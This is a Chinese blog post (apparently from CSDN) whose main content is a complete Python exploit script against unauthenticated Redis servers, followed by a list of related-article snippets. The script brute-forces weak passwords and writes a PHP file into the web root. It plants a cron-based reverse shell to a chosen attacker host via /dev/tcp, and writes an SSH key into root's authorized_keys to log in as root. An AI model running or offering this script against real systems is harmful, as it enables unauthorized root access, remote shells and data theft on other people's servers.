redis未授权漏洞利用脚本

最新推荐文章于 2024-06-13 22:54:47 发布
最新推荐文章于 2024-06-13 22:54:47 发布
阅读量680 收藏
点赞数
分类专栏: web安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42529356/article/details/113812474
版权 
#! /usr/bin/env python
# _*_  coding:utf-8 _*_
import socket
import sys
import os


class PAYLOAD(object):
    def __init__(self,ip,port,timeout):
        self.ip=ip
        self.port=port
        self.timeout=timeout
        self.PASSWORD_DIC=['redis','root','oracle','password','p@aaw0rd','abc123!','123456','admin']
    def check(self):
        '''
        检查redis是否存在未授权漏洞,或者存在弱密码
        :return:
        '''
        try:
            socket.setdefaulttimeout(self.timeout)
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((self.ip, int(self.port)))
            s.send(b"INFO\r\n")
            result = s.recv(1024).decode('utf-8')
            if "redis_version" in result:
                return u"未授权访问"
            elif "Authentication" in result:
                for pass_ in self.PASSWORD_DIC:
                    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    s.connect((ip, int(port)))
                    s.send(b"AUTH %s\r\n" %(pass_))
                    result = s.recv(1024).decode('utf-8')
                    if '+OK' in result:
                        return u"存在弱口令,密码:%s" % (pass_)
        except Exception as e:
            print(e)




    def upload_phpinfo(self):
        '''
        通过redis未授权漏洞上传phpinfo
        :return:
        '''
        try:
            socket.setdefaulttimeout(self.timeout)
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((self.ip, int(self.port)))
            s.send(b"config set dir /var/www/html\r\n")
            print('config set dir /var/www/html')
            print(s.recv(1024).decode('utf-8'))
            s.send(b"config set dbfilename redis1.php\r\n")
            print('config set dbfilename redis1.php')
            print(s.recv(1024).decode('utf-8'))
            s.send(b'set x \"<?php phpinfo();?>"\r\n')
            print('set x "\r\n\r\n<?php phpinfo();?>\r\n\r\n"')
            print(s.recv(1024).decode('utf-8'))
            s.send(b'save\r\n')
            print('save')
            print(s.recv(1024).decode('utf-8'))
        except Exception as e:
            print(e)
    def recerive_tcp(self,rhost,rport):
        '''
        使用redis未授权漏洞,上传反弹链接
        方法未成功
        :return:
        '''
        try:
            socket.setdefaulttimeout(self.timeout)
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((self.ip, int(self.port)))
            s.send(b"config set dir /var/spool/cron\r\n")
            print('config set dir /var/spool/cron')
            print(s.recv(1024).decode('utf-8'))
            s.send(b"config set dbfilename root\r\n")
            print('config set dbfilename root')
            print(s.recv(1024).decode('utf-8'))
            s.send('set xxx "*/1 * * * * /bin/bash -i>&/dev/tcp/{}/{} 0>&1"\r\n'.format(rhost,rport).encode('utf-8'))
            print('set xxx "*/1 * * * * /bin/bash -i>&/dev/tcp/{}/{} 0>&1"'.format(rhost,rport))
            print(s.recv(1024).decode('utf-8'))
            s.send(b'save\r\n')
            print('save')
            print(s.recv(1024).decode('utf-8'))
        except Exception as e:
            print(e)
    def ssh_connect(self):
        '''
        利用‘公私钥’实现获取root权限
        :return:
        '''
        try:
            os.system('ssh-keygen -t rsa')  #生成公私钥
            os.system('(echo -e "\n\n" ; cat /root/.ssh/id_rsa.pub ; echo -e "\n\n") > /root/.ssh/public.txt')
            os.system('cat /root/.ssh/public.txt | redis-cli -h {} -p {} -x set authorized_keys'.format(self.ip,self.port))  #将公钥放到redia数据库中
            socket.setdefaulttimeout(self.timeout)
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((self.ip, int(self.port)))
            s.send(b"config set dir /root/.ssh\r\n")
            print('config set dir /root/.ssh')
            print(s.recv(1024).decode('utf-8'))
            s.send(b"config set dbfilename authorized_keys\r\n")
            print('config set dbfilename authorized_keys')
            print(s.recv(1024).decode('utf-8'))
            s.send(b'save\r\n')
            print('save')
            print(s.recv(1024).decode('utf-8'))
            os.system('ssh -i id_rsa root@{}'.format(self.ip))  #  使用私钥连接
        except Exception as e:
            print(e)




if __name__ == '__main__':
    ip=sys.argv[1]
    port=sys.argv[2]
    p=PAYLOAD(ip,port,timeout=20)
    p.ssh_connect()
鑫达达
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Redis授权访问漏洞利用
Au
02-28 1817
Redis是一个开源的高性能的key-value数据库 默认端口6379 Redis因配置不当可以授权访问,攻击者无需认证访问到内部数据,可导致敏感信息泄露 漏洞利用:核心就是进行写文件操作 可以获取敏感信息,操作数据库,SSH远程登录,写入webshell 环境搭建: kali 2019(攻击机)ip: 192.168.25.137 Ubuntu 16.04 (靶机,...
Redis 授权访问漏洞(附Python脚本
09-21 794
&#13; 0x01 环境搭建&#13; &#13; #下载并安装&#13; cd /tmp&#13; wget http://download.redis.io/releases/redis-2.8.17.tar.gz&#13; tar xzf redis-2.8.17.tar.gz&#13; cd redis-2.8.17&#13; make&#13; #启动redis服...
redis授权访问等
最新发布
尘玥的故事
06-13 330
redis 默认情况下,绑定在 0.0.0.0:6379,若没有采用相关的策略,如添加防火墙规则避免其他非信任来源 ip 访问等,会将 redis 服务暴露到公网上。如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 redis 以及读取 redis 的数据。
redis授权访问
热门推荐
guxiaoguo的博客
12-27 1万+
本篇主要从redis授权访问入手,还原一些黑客的攻击场景,介绍一些常用的攻击方法和安全知识。 应用介绍 漏洞介绍 测试环境 说明攻击方法 redis日志 修复方案 作者:悦潺@安全之光 一. 应用介绍   Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、 Key-Value数
Redis授权扫描脚本
weixin_30367945的博客
12-29 175
Rescan Redis Unauthorized Scan Lib https://github.com/google/ipaddr-py git clone https://github.com/google/ipaddr-py.git cd ipaddr-py sudo python setup.py install https://pypi.python.org/pypi/futures...
redis授权漏洞自动化单个利用脚本
weixin_30576859的博客
10-11 108
1 #!/usr/bin/python 2 import redis 3 import urlparse 4 import sys 5 import pexpect 6 import socket 7 from optparse import OptionParser 8 9 10 def verify(host, port=6379):...
Redis授权访问配合SSH key文件利用详解
09-09
本文将详细讨论一个常见的安全问题:Redis授权访问配合SSH key文件利用。 Redis默认监听在`0.0.0.0:6379`,这意味着它对所有网络接口开放,如果不加以限制,任何能够访问到服务器的人都可以尝试连接Redis。特别是...
Redis在Windows下的利用方式思考R3start1
08-03
总的来说,这篇文章探讨了在Windows环境中,如何利用Redis服务进行非授权的系统控制和恶意活动。虽然这些方法可用于安全测试和漏洞研究,但它们同样可能被恶意攻击者利用,因此对于系统管理员来说,了解并防范这类...
redis权限webshell1
08-08
· Regularly review Redis 服务器的配置文件和日志,防止授权的访问。 此外,企业内部可以使用 nmap 扫描内网网段的 Redis anonymous access 服务,以检测 Redis 服务器的漏洞。 `nmap -p6379 10.11.0/16 --...
redis-4.0.11已编译压缩包
08-22
7. **安全性和稳定性**:Redis 4.0.11修复了多个安全漏洞和已知问题,提高了系统的稳定性和安全性。 压缩包中的“redis-4.0.11”目录很可能包含了以下文件和目录: - `src/`:包含Redis服务器的源代码编译后的可...
python脚本实现Redis授权批量提权
09-09
主要给大家介绍了关于利用python脚本实现redis授权批量提权的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧。
unauthorized-check:扫描常见授权访问(redis,mongodb,memcached,elasticsearch,zookeeper,ftp,CouchDB,docker,Hadoop)
03-08
授权的检查 扫描以下常见授权访问 redis、mongodb、memcached、elasticsearch、zookeeper、ftp、CouchDB、docker、Hadoop 安装 pip3 install -r requirements.txt -i https://mirrors.aliyun.com/pypi/simple/ 使用说明 python3 unauthorized-check.py url.txt
Redis授权访问
npc88888的博客
05-09 1659
在 Reids 4.x 之后,Redis新增了模块功能,通过外部拓展,可以实现在redis中实 现一个新的Redis命令,通过c语言编译并加载恶意.so文件,达到代码执行的目的。更改目标服务器Redis备份路径为ssh公钥存放目录(一般默认为/root/.ssh):config set dir /root/.ssh。原文链接:https://blog.csdn.net/weixin_45605352/article/details/118790775。进入/root/.ssh目录: 将生成的公钥保存到。
【渗透测试】redis漏洞利用
网络安全从业者的学习笔记
03-16 1389
redis是一个key-value存储系统,在诸多版本中存在一系列的漏洞,对漏洞进行复现:写入Webshell、写入定时任务、主从复制命令执行、如何通过利用SSRF结合gopher、dict协议打redis。切勿利用漏洞非法获取数据
Redis授权访问漏洞验证脚本编写(POC)
Mrs_H的博客
04-11 1432
Redis授权访问漏洞验证脚本编写(POC) 1.实验环境: Ubuntu18(靶机) kali linux(攻击机) 2.代码的编写: import sys import getopt import socket def url_exec(url):#将要探测的主机地址都存入一个待测数组内 ans = [] group = [] li = url.split(".") if (url.find('-') == -1): group.append(url
攻防_漏洞_Redis授权
redglare的博客
01-11 1914
原文链接:http://www.cnblogs.com/bmjoker/p/9548962.html 一、漏洞简介以及危害: 1.什么是redis授权访问漏洞: Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在
druid授权--python脚本
qq_39677803的博客
11-19 969
一、检测ip vim druid授权-ip.py import requests import warnings from threading import Thread warnings.filterwarnings('ignore') # 忽略SSL警告 # 通过警告过滤器进行控制是否发出警告消息。 def main(): druid = '/druid/websession.html' url_list = [] # 空列表 with open("url
Redis授权访问利用总结
2ed
10-09 1652
漏洞概述 Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥直接登录目标服务器。 漏洞...
Redis授权漏洞的危害
04-04
Redis授权漏洞的危害包括但不限于以下几点: 1. 数据泄露:攻击者可以通过访问Redis授权的服务,获取到Redis中存储的敏感数据,例如用户密码、数据库信息、业务数据等。 2. 数据篡改:攻击者可以通过访问Redis...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值